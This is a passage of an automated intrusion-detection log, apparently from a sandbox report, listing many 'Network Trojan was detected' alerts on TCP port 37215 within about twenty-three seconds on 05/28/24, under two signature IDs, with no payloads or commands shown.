                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492364
                  SID:2829579
                  Source Port:49670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295963
                  SID:2829579
                  Source Port:41374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906094
                  SID:2835222
                  Source Port:46002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576380
                  SID:2829579
                  Source Port:55850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588461
                  SID:2835222
                  Source Port:36744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696383
                  SID:2835222
                  Source Port:46688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493240
                  SID:2829579
                  Source Port:40194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531413
                  SID:2829579
                  Source Port:34516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487954
                  SID:2835222
                  Source Port:39162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800752
                  SID:2829579
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661157
                  SID:2829579
                  Source Port:34874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911681
                  SID:2829579
                  Source Port:40430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543732
                  SID:2835222
                  Source Port:40320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696709
                  SID:2829579
                  Source Port:43542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887419
                  SID:2829579
                  Source Port:34778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765345
                  SID:2835222
                  Source Port:51390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.873300
                  SID:2829579
                  Source Port:46034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887951
                  SID:2835222
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577061
                  SID:2835222
                  Source Port:55820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528844
                  SID:2829579
                  Source Port:47396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627915
                  SID:2835222
                  Source Port:39562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788321
                  SID:2835222
                  Source Port:44336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768675
                  SID:2835222
                  Source Port:50198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888306
                  SID:2829579
                  Source Port:43572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536598
                  SID:2835222
                  Source Port:38022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786405
                  SID:2829579
                  Source Port:55306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765424
                  SID:2829579
                  Source Port:51096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904732
                  SID:2835222
                  Source Port:43498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911164
                  SID:2829579
                  Source Port:37330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315498
                  SID:2835222
                  Source Port:55410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649744
                  SID:2835222
                  Source Port:38634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650828
                  SID:2829579
                  Source Port:49354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319925
                  SID:2835222
                  Source Port:59454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911157
                  SID:2829579
                  Source Port:41858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.919971
                  SID:2829579
                  Source Port:48092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.922466
                  SID:2835222
                  Source Port:58878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278416
                  SID:2835222
                  Source Port:49230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766103
                  SID:2829579
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555670
                  SID:2829579
                  Source Port:59148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294541
                  SID:2829579
                  Source Port:48442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923052
                  SID:2835222
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912218
                  SID:2829579
                  Source Port:45398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846085
                  SID:2835222
                  Source Port:50920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847595
                  SID:2835222
                  Source Port:45008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555930
                  SID:2829579
                  Source Port:51402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742471
                  SID:2835222
                  Source Port:36504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584166
                  SID:2835222
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911626
                  SID:2829579
                  Source Port:41836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315736
                  SID:2835222
                  Source Port:44000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788939
                  SID:2835222
                  Source Port:50884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659915
                  SID:2835222
                  Source Port:37300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531568
                  SID:2829579
                  Source Port:42018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316241
                  SID:2829579
                  Source Port:49674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.575988
                  SID:2835222
                  Source Port:47074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745922
                  SID:2829579
                  Source Port:57434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694989
                  SID:2835222
                  Source Port:35106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627926
                  SID:2829579
                  Source Port:44402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790973
                  SID:2829579
                  Source Port:42770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866329
                  SID:2829579
                  Source Port:44962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583266
                  SID:2829579
                  Source Port:57366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920471
                  SID:2829579
                  Source Port:44628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788196
                  SID:2835222
                  Source Port:37162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494530
                  SID:2829579
                  Source Port:60156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627798
                  SID:2829579
                  Source Port:38392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790731
                  SID:2829579
                  Source Port:41696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885473
                  SID:2835222
                  Source Port:46914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907619
                  SID:2829579
                  Source Port:34980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755595
                  SID:2829579
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536733
                  SID:2829579
                  Source Port:50908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702574
                  SID:2835222
                  Source Port:45262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531536
                  SID:2829579
                  Source Port:45248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846426
                  SID:2835222
                  Source Port:48526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.881163
                  SID:2829579
                  Source Port:36838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907491
                  SID:2835222
                  Source Port:58174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278398
                  SID:2829579
                  Source Port:41292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713749
                  SID:2835222
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910522
                  SID:2829579
                  Source Port:35972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849083
                  SID:2829579
                  Source Port:53876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918151
                  SID:2829579
                  Source Port:54744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791738
                  SID:2829579
                  Source Port:41798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742912
                  SID:2835222
                  Source Port:40482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771452
                  SID:2835222
                  Source Port:41434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796838
                  SID:2829579
                  Source Port:52100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788115
                  SID:2835222
                  Source Port:60352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323466
                  SID:2835222
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316589
                  SID:2835222
                  Source Port:33324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316377
                  SID:2829579
                  Source Port:34686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781097
                  SID:2829579
                  Source Port:39680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880046
                  SID:2835222
                  Source Port:36864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908638
                  SID:2835222
                  Source Port:36222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781177
                  SID:2835222
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488807
                  SID:2835222
                  Source Port:59470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678794
                  SID:2829579
                  Source Port:48810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660694
                  SID:2829579
                  Source Port:58032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489343
                  SID:2829579
                  Source Port:56670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942559
                  SID:2829579
                  Source Port:59412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796696
                  SID:2835222
                  Source Port:55150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.811562
                  SID:2829579
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656772
                  SID:2835222
                  Source Port:35088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527428
                  SID:2835222
                  Source Port:42292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547669
                  SID:2829579
                  Source Port:34744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578662
                  SID:2829579
                  Source Port:48734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696061
                  SID:2835222
                  Source Port:54872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849144
                  SID:2835222
                  Source Port:36440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584142
                  SID:2835222
                  Source Port:39768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536568
                  SID:2835222
                  Source Port:57744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916846
                  SID:2829579
                  Source Port:39390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292617
                  SID:2829579
                  Source Port:45176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488885
                  SID:2835222
                  Source Port:53724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665537
                  SID:2829579
                  Source Port:49876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660569
                  SID:2829579
                  Source Port:41124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578052
                  SID:2829579
                  Source Port:36054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.873546
                  SID:2829579
                  Source Port:54834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771397
                  SID:2829579
                  Source Port:46538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790355
                  SID:2829579
                  Source Port:54158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810492
                  SID:2835222
                  Source Port:56438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887967
                  SID:2829579
                  Source Port:38022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316324
                  SID:2829579
                  Source Port:41386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543467
                  SID:2829579
                  Source Port:35956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586021
                  SID:2835222
                  Source Port:58164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785616
                  SID:2835222
                  Source Port:43890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696120
                  SID:2835222
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910500
                  SID:2835222
                  Source Port:35694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659240
                  SID:2829579
                  Source Port:58712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494950
                  SID:2829579
                  Source Port:49702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299062
                  SID:2829579
                  Source Port:33416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907644
                  SID:2835222
                  Source Port:51624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530587
                  SID:2829579
                  Source Port:51384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845968
                  SID:2835222
                  Source Port:49696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586445
                  SID:2835222
                  Source Port:35334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793323
                  SID:2829579
                  Source Port:36602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911170
                  SID:2829579
                  Source Port:36490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768542
                  SID:2835222
                  Source Port:33532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545295
                  SID:2835222
                  Source Port:50298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494508
                  SID:2829579
                  Source Port:57084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296752
                  SID:2835222
                  Source Port:36652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790952
                  SID:2829579
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847236
                  SID:2829579
                  Source Port:57250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742635
                  SID:2835222
                  Source Port:55690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536615
                  SID:2829579
                  Source Port:41460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870634
                  SID:2835222
                  Source Port:57092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544972
                  SID:2829579
                  Source Port:39964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795583
                  SID:2835222
                  Source Port:50296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649342
                  SID:2835222
                  Source Port:53290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496394
                  SID:2835222
                  Source Port:47126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.792552
                  SID:2835222
                  Source Port:46842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794540
                  SID:2829579
                  Source Port:55854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550697
                  SID:2829579
                  Source Port:48174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887348
                  SID:2835222
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904732
                  SID:2829579
                  Source Port:43498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907255
                  SID:2835222
                  Source Port:46228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927229
                  SID:2829579
                  Source Port:35670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649744
                  SID:2829579
                  Source Port:38634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496255
                  SID:2835222
                  Source Port:42504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.290845
                  SID:2829579
                  Source Port:50628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530479
                  SID:2835222
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530976
                  SID:2829579
                  Source Port:55912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.719163
                  SID:2829579
                  Source Port:34980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487954
                  SID:2829579
                  Source Port:39162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785573
                  SID:2829579
                  Source Port:51396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742851
                  SID:2829579
                  Source Port:38106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536077
                  SID:2835222
                  Source Port:55338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494950
                  SID:2835222
                  Source Port:49702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292647
                  SID:2829579
                  Source Port:51698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923040
                  SID:2829579
                  Source Port:47060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843636
                  SID:2829579
                  Source Port:60744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660077
                  SID:2835222
                  Source Port:52742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916882
                  SID:2835222
                  Source Port:58430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548204
                  SID:2829579
                  Source Port:46838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766269
                  SID:2835222
                  Source Port:42552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591848
                  SID:2829579
                  Source Port:39458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803880
                  SID:2829579
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920703
                  SID:2829579
                  Source Port:32788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844967
                  SID:2835222
                  Source Port:40508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906500
                  SID:2829579
                  Source Port:51072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684159
                  SID:2829579
                  Source Port:34882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604594
                  SID:2835222
                  Source Port:44086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292617
                  SID:2835222
                  Source Port:45176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737607
                  SID:2829579
                  Source Port:38998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695156
                  SID:2835222
                  Source Port:59990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294595
                  SID:2835222
                  Source Port:48888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592944
                  SID:2835222
                  Source Port:38478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649572
                  SID:2835222
